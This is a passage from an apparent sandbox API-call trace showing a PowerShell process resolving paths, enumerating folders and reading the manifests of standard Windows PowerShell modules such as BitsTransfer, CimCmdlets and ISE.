[7]=0x15))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0x5b2b8980, Data2=0xaa44, Data3=0x4a67, Data4=([0]=0x86, [1]=0x40, [2]=0xd5, [3]=0x56, [4]=0x13, [5]=0x45, [6]=0xb8, [7]=0x14))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0xdcbd2c31, Data2=0xe82e, Data3=0x4ba5, Data4=([0]=0x9d, [1]=0x65, [2]=0x7a, [3]=0x74, [4]=0x6b, [5]=0xb7, [6]=0xf4, [7]=0xf0))) returned 0x0 [0152.496] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5a0ad4c, nSize=0xfa | out: lpBuffer="") returned 0x0 [0152.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management", nBufferLength=0x105, lpBuffer=0x5a0b440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management", lpFilePart=0x0) returned 0x72 [0152.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management", nBufferLength=0x105, lpBuffer=0x5a0b3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management", lpFilePart=0x0) returned 0x72 [0152.985] CoGetContextToken (in: pToken=0x5a0abd4 | out: pToken=0x5a0abd4) returned 0x0 [0152.985] CObjectContext::QueryInterface () returned 0x0 [0152.987] CObjectContext::GetCurrentApartmentType () returned 0x0 [0152.987] Release () returned 0x0 [0152.988] CoGetObjectContext (in: riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5c09f2c | out: ppv=0x5c09f2c*=0x6239d0) returned 0x0 [0152.989] CoGetContextToken (in: pToken=0x5a0afe4 | out: pToken=0x5a0afe4) returned 0x0 [0152.989] CoGetContextToken (in: pToken=0x5a0b5b4 | out: pToken=0x5a0b5b4) returned 0x0 [0152.989] CoGetContextToken (in: pToken=0x5a0b514 | out: pToken=0x5a0b514) returned 0x0 [0152.990] CoGetContextToken (in: pToken=0x5a0b644 | out: pToken=0x5a0b644) returned 0x0 [0153.012] CoGetContextToken (in: pToken=0x5a0abcc | out: pToken=0x5a0abcc) returned 0x0 [0153.012] CoGetContextToken (in: pToken=0x5a0afdc | out: pToken=0x5a0afdc) returned 0x0 [0153.012] CoGetContextToken (in: pToken=0x5a0b5ac | out: pToken=0x5a0b5ac) returned 0x0 [0153.012] CoGetContextToken (in: pToken=0x5a0b50c | out: pToken=0x5a0b50c) returned 0x0 [0153.015] CoGetContextToken (in: pToken=0x5a0abc4 | out: pToken=0x5a0abc4) returned 0x0 [0153.015] CoGetContextToken (in: pToken=0x5a0afd4 | out: pToken=0x5a0afd4) returned 0x0 [0153.015] CoGetContextToken (in: pToken=0x5a0b5a4 | out: pToken=0x5a0b5a4) returned 0x0 [0153.016] CoGetContextToken (in: pToken=0x5a0b504 | out: pToken=0x5a0b504) returned 0x0 [0153.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.BackgroundIntelligentTransfer.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.BackgroundIntelligentTransfer.Management.dll", nBufferLength=0x105, lpBuffer=0x5a0b3e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.BackgroundIntelligentTransfer.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.BackgroundIntelligentTransfer.Management.dll", lpFilePart=0x0) returned 0xa0 [0153.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.BackgroundIntelligentTransfer.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.BackgroundIntelligentTransfer.Management.dll", nBufferLength=0x105, lpBuffer=0x5a0b2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.BackgroundIntelligentTransfer.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.BackgroundIntelligentTransfer.Management.dll", lpFilePart=0x0) returned 0xa0 [0153.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0153.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0153.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0dbb0) returned 1 [0153.339] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0x274cf28 | out: lpFileInformation=0x274cf28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a2760e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x14a2760e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x37b3dedc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3b6)) returned 1 [0153.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0dbac) returned 1 [0153.340] EtwEventActivityIdControl () returned 0x0 [0153.340] EtwEventActivityIdControl () returned 0x0 [0153.340] SetEvent (hEvent=0x36c) returned 1 [0153.341] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5a0e390*=0x36c, lpdwindex=0x5a0e1b4 | out: lpdwindex=0x5a0e1b4) returned 0x0 [0153.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0153.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0153.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e270) returned 1 [0153.341] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0x274e764 | out: lpFileInformation=0x274e764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a2760e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x14a2760e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x37b3dedc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3b6)) returned 1 [0153.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e26c) returned 1 [0153.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0153.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0153.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0153.342] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\cimcmdlets\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4b8 [0153.342] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.342] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a3e9e0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90a3e9e0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x5eaf6a81, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0153.342] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a3e9e0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90a3e9e0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x5eaf6a81, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 0 [0153.342] FindClose (in: hFindFile=0x5bfe4b8 | out: hFindFile=0x5bfe4b8) returned 1 [0153.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0153.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0153.343] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1")) returned 0x20 [0153.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0153.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x4e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0153.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0153.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x4e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0153.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0153.343] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1"), fInfoLevelId=0x0, lpFileInformation=0x274ee14 | out: lpFileInformation=0x274ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a3e9e0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90a3e9e0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x5eaf6a81, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x75e)) returned 1 [0153.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0153.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0153.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x4e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0153.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0153.344] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x520 [0153.344] GetFileType (hFile=0x520) returned 0x1 [0153.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0153.344] GetFileType (hFile=0x520) returned 0x1 [0153.345] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0153.345] ReadFile (in: hFile=0x520, lpBuffer=0x274fbfc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x274fbfc*, lpNumberOfBytesRead=0x5a0e4c8*=0x75e, lpOverlapped=0x0) returned 1 [0153.349] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x75e [0153.349] ReadFile (in: hFile=0x520, lpBuffer=0x274f2fa, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x274f2fa*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0153.349] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x75e [0153.349] ReadFile (in: hFile=0x520, lpBuffer=0x274fbfc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x274fbfc*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0153.349] CloseHandle (hObject=0x520) returned 1 [0153.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0153.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0153.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0153.351] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\ise\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4b8 [0153.352] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.352] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91991780, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x91991780, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4209d5bf, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x208, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0153.352] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911aeea0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x911aeea0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4209d5bf, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0153.352] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911aeea0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x911aeea0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4209d5bf, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 0 [0153.352] FindClose (in: hFindFile=0x5bfe4b8 | out: hFindFile=0x5bfe4b8) returned 1 [0153.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0153.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0153.352] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1")) returned 0x20 [0153.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0153.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f [0153.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0153.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f [0153.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0153.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1"), fInfoLevelId=0x0, lpFileInformation=0x27576d8 | out: lpFileInformation=0x27576d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91991780, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x91991780, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4209d5bf, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x208)) returned 1 [0153.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0153.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0153.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f [0153.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0153.353] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x520 [0153.354] GetFileType (hFile=0x520) returned 0x1 [0153.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0153.354] GetFileType (hFile=0x520) returned 0x1 [0153.354] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0153.354] ReadFile (in: hFile=0x520, lpBuffer=0x27584a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x27584a8*, lpNumberOfBytesRead=0x5a0e4c8*=0x208, lpOverlapped=0x0) returned 1 [0153.420] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x208 [0153.420] ReadFile (in: hFile=0x520, lpBuffer=0x27584a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x27584a8*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0153.420] CloseHandle (hObject=0x520) returned 1 [0153.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0153.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0153.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0153.422] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4b8 [0153.422] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.422] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, 